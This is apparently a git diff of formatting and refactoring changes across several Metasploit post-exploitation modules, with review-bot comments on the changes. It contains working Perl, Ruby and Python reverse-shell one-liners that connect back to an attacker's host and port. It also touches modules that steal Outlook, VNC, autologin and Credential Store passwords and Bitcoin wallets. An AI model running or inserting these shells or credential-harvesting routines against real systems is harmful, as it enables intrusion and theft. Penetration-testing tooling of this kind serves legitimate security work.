ruby_session(lhost,lport) 
@@ -153,8 +153,8 @@ class Metasploit3 < Msf::Post def perl_session(lhost,lport) if cmd_exec("perl -v") =~ /Larry/ print_status("Perl reverse shell selected") - cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET \ -(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'" + cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET " + + "(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'" else print_error("No scripting environment found for the selected type.") cmd ="" @@ -166,8 +166,8 @@ class Metasploit3 < Msf::Post def ruby_session(lhost,lport) if cmd_exec("ruby -v") =~ /revision/i print_status("Ruby reverse shell selected") - return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");\ -while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'" + return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");" + + "while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'" else print_error("No scripting environment found for the selected type.") cmd ="" @@ -179,9 +179,9 @@ while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end' def python_session(lhost,lport) if cmd_exec("python -V") =~ /Python 2\.(\d)/ print_status("Python reverse shell selected") - return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,\ -socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);\ -os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" + return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET," + + "socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);" + + "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" else print_error("No scripting environment found for the selected type.") cmd ="" 
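Review bot: The three rewritten `*_session` methods do not agree on how they hand back the command: `perl_session` assigns `cmd` in both branches, while `ruby_session` and `python_session` `return` from the success branch but fall through to `cmd = ""` in the `else`, leaving whatever follows the hunk to return it (the method tails are outside these hunks). One shape for all three — `return ""` in every `else`, or assigning `cmd` in both branches — would make the fall-through path obvious, and the identical `print_error("No scripting environment found for the selected type.")` in each `else` could become one helper. The `+`-joined fragments themselves reproduce the old backslash-continued strings byte for byte, so no behaviour changes there.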
@@ -200,4 +200,4 @@ os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" end return cmd end -end \ No newline at end of file +end diff --git a/modules/post/windows/gather/arp_scanner.rb b/modules/post/windows/gather/arp_scanner.rb index 327261fdd4..c3872e1c22 100644 --- a/modules/post/windows/gather/arp_scanner.rb +++ b/modules/post/windows/gather/arp_scanner.rb @@ -68,13 +68,7 @@ class Metasploit3 < Msf::Post ip = h["return"] h = iphlp.SendARP(ip,0,6,6) if h["return"] == client.railgun.const("NO_ERROR") - mac = h["pMacAddr"] - mac_text = mac[0].ord.to_s(16) + ":" + - mac[1].ord.to_s(16) + ":" + - mac[2].ord.to_s(16) + ":" + - mac[3].ord.to_s(16) + ":" + - mac[4].ord.to_s(16) + ":" + - mac[5].ord.to_s(16) + mac_text = h["pMacAddr"].unpack('C*').map { |e| "%02x" % e }.join(':') print_status("\tIP: #{ip_text} MAC #{mac_text}") report_host(:host => ip_text,:mac => mac_text) end diff --git a/modules/post/windows/gather/bitcoin_jacker.rb b/modules/post/windows/gather/bitcoin_jacker.rb old mode 100755 new mode 100644 index e5c4792b78..af1ea56f91 --- a/modules/post/windows/gather/bitcoin_jacker.rb +++ b/modules/post/windows/gather/bitcoin_jacker.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Post wallet = session.fs.file.new(filename, "rb") until wallet.eof? data << wallet.read - end + end store_loot("bitcoin.wallet", "application/octet-stream", session, data, filename, "Bitcoin Wallet") print_status(" Wallet Jacked.") diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb index ffe83ad3f9..3aad4255e3 100644 --- a/modules/post/windows/gather/cachedump.rb +++ b/modules/post/windows/gather/cachedump.rb @@ -328,7 +328,7 @@ class Metasploit3 < Msf::Post hash.unpack("H*")[0], logonDomainName, dnsDomainName, - last.strftime("%F %T"), + last.strftime("%F %T"), upn, effectiveName, fullName, 
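Review bot: `mac_text` in the arp_scanner hunk now formats every byte of `h["pMacAddr"]`, so the printed MAC is only right if railgun hands back exactly the 6 bytes requested in `SendARP(ip,0,6,6)`; the replaced code read indices 0..5 and was indifferent to a larger buffer. Slicing keeps the new one-liner and the old bound: `mac_text = h["pMacAddr"][0, 6].unpack('C*').map { |e| "%02x" % e }.join(':')`. Whether railgun can ever return more than the requested length is not visible here; if it cannot, the slice is purely defensive.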
diff --git a/modules/post/windows/gather/credentials/enum_cred_store.rb b/modules/post/windows/gather/credentials/enum_cred_store.rb index 5d64667166..f94a26c641 100644 --- a/modules/post/windows/gather/credentials/enum_cred_store.rb +++ b/modules/post/windows/gather/credentials/enum_cred_store.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will enumerate the Microsoft Credential Store and decrypt the credentials. This module can only access credentials created by the user the - process is running as. It cannot decrypt Domain Network Passwords, but will + process is running as. It cannot decrypt Domain Network Passwords, but will display the username and location. }, 'License' => MSF_LICENSE, @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Post end return str_data || "Error Decrypting" end - + def decrypt_blob(daddr, dlen, type) #type 0 = passport cred, type 1 = wininet cred #set up entropy @@ -112,7 +112,7 @@ class Metasploit3 < Msf::Post def gethost(hostorip) #check for valid ip and return if it is - return hostorip if Rex::Socket.dotted_ip?(hostorip) + return hostorip if Rex::Socket.dotted_ip?(hostorip) #convert hostname to ip and return it hostip = nil @@ -159,7 +159,7 @@ class Metasploit3 < Msf::Post ip_add= gethost(host) - unless ip_add.nil? + unless ip_add.nil? auth = { :host => ip_add, :port => port, @@ -185,10 +185,10 @@ class Metasploit3 < Msf::Post #call credenumerate to get the ptr needed adv32 = session.railgun.advapi32 ret = adv32.CredEnumerateA(nil,0,4,4) - p_to_arr = ret["Credentials"].unpack("V") + p_to_arr = ret["Credentials"].unpack("V") arr_len = ret["Count"] * 4 if is_86 arr_len = ret["Count"] * 8 unless is_86 - + #tell user what's going on print_status("#{ret["Count"]} credentials found in the Credential Store") if ret["Count"] > 0 diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index 81dba96cea..c4ca4059b5 100644 
--- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -140,8 +140,10 @@ class Metasploit3 < Msf::Post end file.close - creds, perms, config = parse_server(fs_xml) # user credentials password is just an MD5 hash - # admin pass is just plain text. Priorities? + # user credentials password is just an MD5 hash + # admin pass is just plain text. Priorities? + creds, perms, config = parse_server(fs_xml) + creds.each do |cred| credentials << [cred['host'], cred['port'], cred['user'], cred['password'], cred['ssl']] diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb index cf5202c019..d9d1f99c61 100644 --- a/modules/post/windows/gather/credentials/outlook.rb +++ b/modules/post/windows/gather/credentials/outlook.rb 
@@ -82,21 +82,27 @@ class Metasploit3 < Msf::Post return decrypted_pw end + # Just a wrapper to avoid copy pasta and long lines + def get_valdata(k, name) + key_base = "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" + registry_getvaldata("#{key_base}\\#{k}", name) + end def get_registry #Determine if saved accounts exist within Outlook. Ignore the Address Book and Personal Folder registry entries. outlook_exists = 0 saved_accounts = 0 - next_account_id = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\", 'NextAccountID') + + next_account_id = get_valdata("", 'NextAccountID') if next_account_id != nil #Microsoft Outlook not found print_status "Microsoft Outlook found in Registry..." outlook_exists = 1 - registry_enumkeys("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\").each do |k| - display_name = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Display Name') + registry_enumkeys(key_base + "9375CFF0413111d3B88A00104B2A6676\\").each do |k| + display_name = get_valdata(k, 'Display Name') if display_name == nil #Microsoft Outlook found, but no account data saved in this location 
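Review bot: `registry_enumkeys(key_base + "9375CFF0413111d3B88A00104B2A6676\\")` in `get_registry` refers to `key_base`, but that name is only a local inside the new `get_valdata` helper, so unless the file defines a `key_base` method elsewhere this line raises NameError as soon as Outlook is found; and even with the variable in scope the concatenation would repeat the profile GUID that `key_base` already ends with. Hoist the path out of the helper into a method, e.g. `def key_base; "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"; end`, have `get_valdata` call it, and enumerate with `registry_enumkeys(key_base + "\\")` to reproduce the old path exactly. A one-line comment on the helper naming the Outlook profile key it roots at would say more than "avoid copy pasta". `get_registry` continues well past this hunk.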
@@ -106,17 +112,17 @@ class Metasploit3 < Msf::Post #Account found - parse through registry data to determine account type. Parse remaining registry data after to speed up module. saved_accounts = 1 got_user_pw = 0 - accountname = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Account Name') - displayname = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Display Name') - email = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Email') - pop3_server = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Server') - smtp_server = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Server') - http_server_url = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP Server URL') - imap_server = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Server') - smtp_use_auth = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Use Auth') + accountname = get_valdata(k, 'Account Name') + displayname = get_valdata(k, 'Display Name') + email = get_valdata(k, 'Email') + pop3_server = get_valdata(k, 'POP3 Server') + smtp_server = get_valdata(k, 'SMTP 
Server') + http_server_url = get_valdata(k, 'HTTP Server URL') + imap_server = get_valdata(k, 'IMAP Server') + smtp_use_auth = get_valdata(k, 'SMTP Use Auth') if smtp_use_auth != nil - smtp_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP User') - smtp_password = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Password') + smtp_user = get_valdata(k, 'SMTP User') + smtp_password = get_valdata(k, 'SMTP Password') end if pop3_server != nil @@ -136,10 +142,10 @@ class Metasploit3 < Msf::Post print_status(" User E-mail Address: #{email}") if type == "POP3" - pop3_pw = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Password') - pop3_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 User') - pop3_use_spa = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Use SPA') - smtp_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Port') + pop3_pw = get_valdata(k, 'POP3 Password') + pop3_user = get_valdata(k, 'POP3 User') + pop3_use_spa = get_valdata(k, 'POP3 Use SPA') + smtp_port = get_valdata(k, 'SMTP Port') print_status(" User Name: #{pop3_user}") if pop3_pw == nil 
@@ -160,14 +166,14 @@ class Metasploit3 < Msf::Post print_status(" Incoming Mail Server (POP3): #{pop3_server}") - pop3_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Use SSL') + pop3_use_ssl = get_valdata(k, 'POP3 Use SSL') if pop3_use_ssl == nil print_status(" POP3 Use SSL: No") else print_status(" POP3 Use SSL: Yes") end - pop3_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Port') + pop3_port = get_valdata(k, 'POP3 Port') if pop3_port == nil print_status(" POP3 Port: 110") portnum = 110 @@ -186,7 +192,7 @@ class Metasploit3 < Msf::Post print_status(" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}") end - smtp_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Use SSL') + smtp_use_ssl = get_valdata(k, 'SMTP Use SSL') if smtp_use_ssl == nil print_status(" SMTP Use SSL: No") else 
@@ -201,9 +207,9 @@ class Metasploit3 < Msf::Post end elsif type == "HTTP" - http_password = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP Password') - http_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP User') - http_use_spa = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP Use SPA') + http_password = get_valdata(k, 'HTTP Password') + http_user = get_valdata(k, 'HTTP User') + http_use_spa = get_valdata(k, 'HTTP Use SPA') print_status(" User Name: #{http_user}") if http_password == nil 
@@ -232,10 +238,10 @@ class Metasploit3 < Msf::Post print_status(" HTTP Server URL: #{http_server_url}") elsif type == "IMAP" - imap_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP User') - imap_use_spa = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Use SPA') - imap_password = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Password') - smtp_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Port') + imap_user = get_valdata(k, 'IMAP User') + imap_use_spa = get_valdata(k, 'IMAP Use SPA') + imap_password = get_valdata(k, 'IMAP Password') + smtp_port = get_valdata(k, 'SMTP Port') print_status(" User Name: #{imap_user}") if imap_password == nil @@ -255,14 +261,14 @@ class Metasploit3 < Msf::Post print_status(" Incoming Mail Server (IMAP): #{imap_server}") - imap_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Use SSL') + imap_use_ssl = get_valdata(k, 'IMAP Use SSL') if imap_use_ssl == nil print_status(" IMAP Use SSL: No") else print_status(" IMAP Use SSL: Yes") end - imap_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Port') + imap_port = get_valdata(k, 'IMAP Port') if imap_port == nil print_status(" IMAP Port: 143") portnum = 143 
@@ -281,7 +287,7 @@ class Metasploit3 < Msf::Post print_status(" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}") end - smtp_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Use SSL') + smtp_use_ssl = get_valdata(k, 'SMTP Use SSL') if smtp_use_ssl == nil print_status(" SMTP Use SSL: No") else diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index c63a83422b..b5781a85ac 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -86,20 +86,20 @@ class Metasploit3 < Msf::Post def run - ''' - Hash format - :name, - :check_file, - :check_reg, - :pass_variable, - :port_variable, - :port, - :hash, - :pass, - :viewonly_variable, - :viewonly_hash, - :viewonly_pass - ''' + ''' + Hash format + :name, + :check_file, + :check_reg, + :pass_variable, + :port_variable, + :port, + :hash, + :pass, + :viewonly_variable, + :viewonly_hash, + :viewonly_pass + ''' locations = [] diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb index 60c3db0ead..cca0dd5480 100644 --- a/modules/post/windows/gather/credentials/windows_autologin.rb +++ b/modules/post/windows/gather/credentials/windows_autologin.rb @@ -53,14 +53,13 @@ class Metasploit3 < Msf::Post creds = Rex::Ui::Text::Table.new( 'Header' => 'Windows AutoLogin Password', 'Ident' => 1, - 'Columns' => - [ + 'Columns' => [ 'Domain', 'UserName', 'Password' ] ) - + has_al = 0 # DefaultDomainName, DefaultUserName, DefaultPassword diff --git a/modules/post/windows/gather/dumplinks.rb b/modules/post/windows/gather/dumplinks.rb index 9900cd26e5..54dde5f77c 100644 --- a/modules/post/windows/gather/dumplinks.rb +++ b/modules/post/windows/gather/dumplinks.rb 
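Review bot: The re-indented `''' Hash format ... '''` block at the top of `run` in vnc.rb is not a comment: Ruby parses it as an empty string, a string literal spanning the listed keys, and another empty string, an unused expression that `ruby -w` reports as an ignored literal and that is evaluated on every run. Convert it to `#` comment lines describing the same keys (`# Hash format: :name, :check_file, :check_reg, :pass_variable, ...`) placed just above `locations = []`. `run` continues past the hunk.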
@@ -157,8 +157,8 @@ class Metasploit3 < Msf::Post lvt['name'] = lnk_file.sysread(lvt['len'] - 0x10) @data_out += "\t\tVolume Name = #{lvt['name']}\n" + - "\t\tVolume Type = #{get_vol_type(lvt['type'])}\n" + - "\t\tVolume SN = 0x%X" % lvt['vol_sn'] + "\n" + "\t\tVolume Type = #{get_vol_type(lvt['type'])}\n" + + "\t\tVolume SN = 0x%X" % lvt['vol_sn'] + "\n" end diff --git a/modules/post/windows/gather/enum_dirperms.rb b/modules/post/windows/gather/enum_dirperms.rb index d0bc9ad801..2e853635fa 100644 --- a/modules/post/windows/gather/enum_dirperms.rb +++ b/modules/post/windows/gather/enum_dirperms.rb @@ -46,11 +46,11 @@ class Metasploit3 < Msf::Post #p = kern.GetCurrentProcess() #get handle to current process pid = session.sys.process.open.pid pr = session.sys.process.open(pid, PROCESS_ALL_ACCESS) - pt = adv.OpenProcessToken(pr.handle, tok_all, 4) #get handle to primary token + pt = adv.OpenProcessToken(pr.handle, tok_all, 4) #get handle to primary token it = adv.DuplicateToken(pt["TokenHandle"],2, 4) # get an impersonation token if it["return"] #if it fails return 0 for error handling return it["DuplicateTokenHandle"] - else + else return 0 end end @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Post gen_map = [0,0,0,0] gen_map = gen_map.pack("L") - #get Security Descriptor for the directory + #get Security Descriptor for the directory f = adv.GetFileSecurityA(dir, si, 20, 20, 4) f = adv.GetFileSecurityA(dir, si, f["lpnLengthNeeded"], f["lpnLengthNeeded"], 4) sd = f["pSecurityDescriptor"] @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Post next if d =~ /^(\.|\.\.)$/ realpath = dpath + '\\' + d if session.fs.file.stat(realpath).directory? - perm = check_dir(realpath, token) + perm = check_dir(realpath, token) if !filter or perm.include? filter print_status(perm + "\t" + realpath) end 
@@ -120,7 +120,7 @@ class Metasploit3 < Msf::Post #get impersonation token print_status("Getting impersonation token...") t = get_imperstoken() - + #loop through sub dirs if we have an impers token..else error if t == 0 print_error("Getting impersonation token failed") diff --git a/modules/post/windows/gather/enum_ms_product_keys.rb b/modules/post/windows/gather/enum_ms_product_keys.rb index 3074efeeae..40aac09849 100644 --- a/modules/post/windows/gather/enum_ms_product_keys.rb +++ b/modules/post/windows/gather/enum_ms_product_keys.rb 
@@ -41,23 +41,24 @@ class Metasploit3 < Msf::Post "License Key" ]) - keys = [["HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId"], - ["HKLM\\SOFTWARE\\Microsoft\\Office\\11.0\\Registration\\{91110409-6000-11D3-8CFE-0150048383C9}", "DigitalProductId"], - ["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-00CA-0000-0000-0000000FF1CE}", "DigitalProductId"], - ["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0014-0000-0000-0000000FF1CE}", "DigitalProductId"], - ["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0051-0000-0000-0000000FF1CE}", "DigitalProductId"], - ["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0053-0000-0000-0000000FF1CE}", "DigitalProductId"], - ["HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\100\\Tools\\Setup", "DigitalProductId"], - ["HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77654"], - ["HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77574"], - ["HKLM\\SOFTWARE\\Microsoft\\Exchange\\Setup", "DigitalProductId"], - ] + keys = [ + [ "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId" ], + [ "HKLM\\SOFTWARE\\Microsoft\\Office\\11.0\\Registration\\{91110409-6000-11D3-8CFE-0150048383C9}", "DigitalProductId" ], + [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-00CA-0000-0000-0000000FF1CE}", "DigitalProductId" ], + [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0014-0000-0000-0000000FF1CE}", "DigitalProductId" ], + [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0051-0000-0000-0000000FF1CE}", "DigitalProductId" ], + [ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0053-0000-0000-0000000FF1CE}", "DigitalProductId" ], + [ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\100\\Tools\\Setup", "DigitalProductId" ], + [ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", 
"DigitalProductId77654" ], + [ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77574" ], + [ "HKLM\\SOFTWARE\\Microsoft\\Exchange\\Setup", "DigitalProductId" ], + ] keys.each do |keyx86| - + #parent key p = keyx86[0,1].join - + #child key c = keyx86[1,1].join @@ -122,7 +123,7 @@ class Metasploit3 < Msf::Post (string_length-1).downto(0) do |s| t = ((mindex << 8) & 0xffffffff) | product_id[s] - product_id[s] = t / 24 + product_id[s] = t / 24 mindex = t % 24 end diff --git a/modules/post/windows/gather/memory_grep.rb b/modules/post/windows/gather/memory_grep.rb index 997256a854..d1483e041e 100644 --- a/modules/post/windows/gather/memory_grep.rb +++ b/modules/post/windows/gather/memory_grep.rb @@ -17,20 +17,19 @@ class Metasploit3 < Msf::Post super( update_info(info, 'Name' => 'Windows Gather Process Memory Grep', 'Description' => %q{ - This module allows for searching the memory space of a proccess for potentially sensitive - data. - }, + This module allows for searching the memory space of a proccess for potentially sensitive + data. + }, 'License' => MSF_LICENSE, 'Author' => ['bannedit'], 'Version' => '$Revision$', 'Platform' => ['windows'], 'SessionTypes' => ['meterpreter' ] )) - register_options( - [ - OptString.new('PROCESS', [true, 'Name of the process to dump memory from', nil]), - OptString.new('REGEX', [true, 'Regular expression to search for with in memory', nil]), - ], self.class) + register_options([ + OptString.new('PROCESS', [true, 'Name of the process to dump memory from', nil]), + OptString.new('REGEX', [true, 'Regular expression to search for with in memory', nil]), + ], self.class) end def run diff --git a/modules/post/windows/gather/reverse_lookup.rb b/modules/post/windows/gather/reverse_lookup.rb index ce87662f21..c03925e4f6 100644 --- a/modules/post/windows/gather/reverse_lookup.rb +++ b/modules/post/windows/gather/reverse_lookup.rb 
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, 'Name' => "Windows Gather IP Range Reverse Lookup", - 'Description' => %q{ + 'Description' => %q{ This module uses Railgun, calling the gethostbyaddr function to resolve a hostname to an IP. }, @@ -34,12 +34,12 @@ class Metasploit3 < Msf::Post ], self.class) end - + def run - - #Add ws2_32 just in case it isn't there... + + #Add ws2_32 just in case it isn't there... session.railgun.ws2_32 - + #Check if gethostbyaddr is available to us modhandle = session.railgun.kernel32.GetModuleHandleA('ws2_32.dll') if modhandle['return'] == 0 @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Post return end end - + #Initialize Railgun 'gethostbyaddr' call' session.railgun.add_function('ws2_32', 'gethostbyaddr', 'DWORD', [ ['PCHAR', 'addr', 'in'], @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Post iplist.each do |x| #Converts an IP in string formate to network byte order format nbi = Rex::Socket.addr_aton(x) - + #Call gethostbyaddr result = session.railgun.ws2_32.gethostbyaddr(nbi.to_s,nbi.size,2) if result['return'] == 0 diff --git a/modules/post/windows/gather/usb_history.rb b/modules/post/windows/gather/usb_history.rb index 957f608bd6..7399852c33 100644 --- a/modules/post/windows/gather/usb_history.rb +++ b/modules/post/windows/gather/usb_history.rb @@ -85,10 +85,10 @@ class Metasploit3 < Msf::Post if isadmin mace = registry_getkeylastwritetime('HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceClasses\\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\' << guid) if mace - keytime = ::Time.at(mace) - else - keytime = "Unknown" - end + keytime = ::Time.at(mace) + else + keytime = "Unknown" + end out << sprintf("%25s\t%50s\n", "Volume lpftLastWriteTime", keytime) end print_status(info_hash_to_str(out, v)) diff --git a/modules/post/windows/manage/autoroute.rb b/modules/post/windows/manage/autoroute.rb index e8d1f2dc55..f25657310a 100644 --- a/modules/post/windows/manage/autoroute.rb 
